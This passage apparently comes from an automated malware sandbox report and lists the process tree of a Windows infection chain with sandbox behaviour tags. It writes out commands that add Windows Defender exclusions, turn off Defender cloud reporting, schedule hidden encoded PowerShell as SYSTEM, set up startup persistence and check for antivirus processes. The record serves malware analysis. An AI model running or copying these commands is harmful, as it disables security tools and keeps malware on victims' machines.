                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:2920
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS3CC3.tmp\Install.exe
                                                                                                                                                .\Install.exe
                                                                                                                                                8⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:2496
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS5DF7.tmp\Install.exe
                                                                                                                                                  .\Install.exe /S /site_id "525403"
                                                                                                                                                  9⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                  PID:3156
                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                    10⤵
                                                                                                                                                      PID:4080
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                        11⤵
                                                                                                                                                          PID:4664
                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                            12⤵
                                                                                                                                                              PID:768
                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                              12⤵
                                                                                                                                                                PID:5144
                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                            10⤵
                                                                                                                                                              PID:3556
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:5056
                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    12⤵
                                                                                                                                                                      PID:1784
                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      12⤵
                                                                                                                                                                        PID:4264
                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    schtasks /CREATE /TN "gPKvXZNuC" /SC once /ST 04:23:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                    PID:5300
                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    schtasks /run /I /tn "gPKvXZNuC"
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:6092
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /DELETE /F /TN "gPKvXZNuC"
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:3948
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 18:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\sOpKwDq.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                                                                                                                        10⤵
                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                        PID:2812
                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\FmzEkQeE092RvzJXs6o8zx5r.exe
                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\FmzEkQeE092RvzJXs6o8zx5r.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  PID:3124
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                    PID:4516
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 924
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:972
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1036
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:632
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1044
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:5040
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1076
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:5516
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1072
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:3588
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1084
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:5776
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1096
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:688
                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\5DEw0GYq8p1VZbbph7v4UOlH.exe
                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\5DEw0GYq8p1VZbbph7v4UOlH.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:1816
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 2376
                                                                                                                                                                      8⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:1848
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c Tue028a363eda.exe
                                                                                                                                                                5⤵
                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                PID:2204
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue028a363eda.exe
                                                                                                                                                                  Tue028a363eda.exe
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:1560
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c Tue02522f9ea0b1.exe
                                                                                                                                                                5⤵
                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                PID:1760
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02522f9ea0b1.exe
                                                                                                                                                                  Tue02522f9ea0b1.exe
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                  PID:1664
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                                                                                                5⤵
                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                PID:3988
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 600
                                                                                                                                                                5⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                PID:4384
                                                                                                                                                        • C:\Windows\system32\taskmgr.exe
                                                                                                                                                          "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                          2⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                          PID:1332
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4D92.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\4D92.exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Checks computer location settings
                                                                                                                                                          PID:4076
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Confronto.vsd
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5908
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:4996
                                                                                                                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                    tasklist /FI "imagename eq BullGuardCore.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                    PID:3228
                                                                                                                                                                  • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                    find /I /N "bullguardcore.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:6108
                                                                                                                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                      tasklist /FI "imagename eq PSUAService.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                      PID:6064
                                                                                                                                                                    • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                      find /I /N "psuaservice.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:2744
                                                                                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                        findstr /V /R "^zsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDk$" Che.vsd
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:5160
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pif
                                                                                                                                                                          Avvelenate.exe.pif V
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                          PID:4416
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pif
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pif
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:5764
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pif
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pif
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:4232
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 12
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Program crash
                                                                                                                                                                                  PID:456
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 52
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Program crash
                                                                                                                                                                                  PID:5484
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5DDF.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\5DDF.exe
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:3416
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 464
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:5132
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 472
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:6088
                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:6072
                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:5696
                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2784
                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:5740
                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4048
                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5840
                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4940
                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:1404
                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4824
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          cmd /c echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSmEbpnuyD.url" & echo URL="C:\Users\Admin\AppData\Local\Temp\aYSXsebblL\wyTKUHhh.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSmEbpnuyD.url"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:1264
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:1692
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2088 -ip 2088
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4220
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3624 -ip 3624
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4988
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1828 -ip 1828
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:3588
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3624 -ip 3624
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4432
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3624 -ip 3624
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:1420
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3624 -ip 3624
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:3120
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3624 -ip 3624
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:884
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3624 -ip 3624
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:4276
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3624 -ip 3624
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5008
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3624 -ip 3624
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:4204
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3624 -ip 3624
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:2444
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4964 -ip 4964
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:4060
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4880 -ip 4880
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:1252
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4964 -ip 4964
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:4648
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4880 -ip 4880
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:5052
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4828 -ip 4828
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:3048
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4892 -ip 4892
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:1252
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3124 -ip 3124
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4056
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4828 -ip 4828
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:2984
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4828 -ip 4828
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:4080
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4828 -ip 4828
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4888
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1816 -ip 1816
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:3868
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4828 -ip 4828
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:1400
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4296 -ip 4296
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:940
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\dtufvra
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\dtufvra
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:4868
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4828 -ip 4828
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:2508
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3124 -ip 3124
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:1692
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4296 -ip 4296
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:5032
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4828 -ip 4828
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:1600
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3124 -ip 3124
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:660
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4296 -ip 4296
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5448
                                                                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -pss -s 524 -p 5740 -ip 5740
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:5792
                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:5264
                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:3108
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3124 -ip 3124
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:3228
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4296 -ip 4296
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:4812
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4828 -ip 4828
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:5432
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3624 -ip 3624
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:4824
                                                                                                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                  PID:5244
                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                  PID:4660
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:1576
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1576 -ip 1576
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:6028
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4296 -ip 4296
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:3808
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3124 -ip 3124
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:5552
